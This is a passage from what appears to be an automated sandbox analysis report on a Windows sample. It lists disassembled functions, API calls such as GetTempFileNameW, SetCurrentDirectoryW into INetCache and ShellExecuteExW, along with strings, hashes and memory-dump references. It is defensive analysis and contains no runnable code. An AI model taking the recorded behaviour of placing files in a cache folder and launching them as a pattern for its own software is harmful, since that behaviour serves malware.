                                                                                                                                                                                          • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 650 4068a5-4068c5 GetSystemDirectoryW 651 4068c7 650->651 652 4068c9-4068cb 650->652 651->652 653 4068dc-4068de 652->653 654 4068cd-4068d6 652->654 656 4068df-406912 wsprintfW LoadLibraryExW 653->656 654->653 655 4068d8-4068da 654->655 655->656
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                                                                                                                          • wsprintfW.USER32 ref: 004068F7
                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040690B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME
                                                                                                                                                                                          • API String ID: 2200240437-1106614640
                                                                                                                                                                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                                          • Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 657 406040-40604c 658 40604d-406081 GetTickCount GetTempFileNameW 657->658 659 406090-406092 658->659 660 406083-406085 658->660 662 40608a-40608d 659->662 660->658 661 406087 660->661 661->662
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040605E
                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                          • API String ID: 1716503409-678247507
                                                                                                                                                                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                                                          • Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
                                                                                                                                                                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 746 4015c6-4015da call 402dab call 405e9b 751 401636-401639 746->751 752 4015dc-4015ef call 405e1d 746->752 754 401668-4022fb call 401423 751->754 755 40163b-40165a call 401423 call 406521 SetCurrentDirectoryW 751->755 761 4015f1-4015f4 752->761 762 401609-40160c call 405acf 752->762 769 402c2f-402c3e 754->769 755->769 772 401660-401663 755->772 761->762 763 4015f6-4015fd call 405aec 761->763 770 401611-401613 762->770 763->762 776 4015ff-401607 call 405a75 763->776 774 401615-40161a 770->774 775 40162c-401634 770->775 772->769 778 401629 774->778 779 40161c-401627 GetFileAttributesW 774->779 775->751 775->752 776->770 778->775 779->775 779->778
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(?,?,00425710,?,00405F0F,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                                                                                                                            • Part of subcall function 00405A75: CreateDirectoryW.KERNEL32(?,?), ref: 00405AB7
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 00401652
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401645
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                          • API String ID: 1892508949-455884830
                                                                                                                                                                                          • Opcode ID: 97cd93f1b33c75ee86f75accdaf92d96180db770228cdcf851d3b183614cfa24
                                                                                                                                                                                          • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97cd93f1b33c75ee86f75accdaf92d96180db770228cdcf851d3b183614cfa24
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 782 401f17-401f89 call 402dab * 4 call 401423 call 405b47 795 402933-40293a 782->795 796 401f8f-401f96 782->796 797 402c2f-402c3e 795->797 796->797 798 401f9c-401ff6 call 4069c0 FindCloseChangeNotification 796->798 798->795 798->797
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00405B47: ShellExecuteExW.SHELL32(?), ref: 00405B56
                                                                                                                                                                                            • Part of subcall function 004069C0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
                                                                                                                                                                                            • Part of subcall function 004069C0: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069F3
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401FF0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • @, xrefs: 00401F8F
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChangeCloseCodeExecuteExitFindNotificationObjectProcessShellSingleWait
                                                                                                                                                                                          • String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                          • API String ID: 4215836453-3372431936
                                                                                                                                                                                          • Opcode ID: d836d7905bb7533233c85fe57c5bfa05dcc9a80140d7520876a6c06b4da0e839
                                                                                                                                                                                          • Instruction ID: 03637a129ab95ddc499dee3230b5434bcfd115e463ad3160f2db423ce5d2e87e
                                                                                                                                                                                          • Opcode Fuzzy Hash: d836d7905bb7533233c85fe57c5bfa05dcc9a80140d7520876a6c06b4da0e839
                                                                                                                                                                                          • Instruction Fuzzy Hash: 09112B71A042189ADB50EFB9CA49B8DB6F0AF14308F20457FE505F72D2DBBC89459F18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                                                                                                                          • Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
                                                                                                                                                                                          • Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                                                                                                                          • Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                                                                                                                          • Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                                                                                                                          • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                                                                                                                                                                                          • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                                                                                                                          • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                                                                                                                          • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                                                                                                                          • Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
                                                                                                                                                                                          • Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
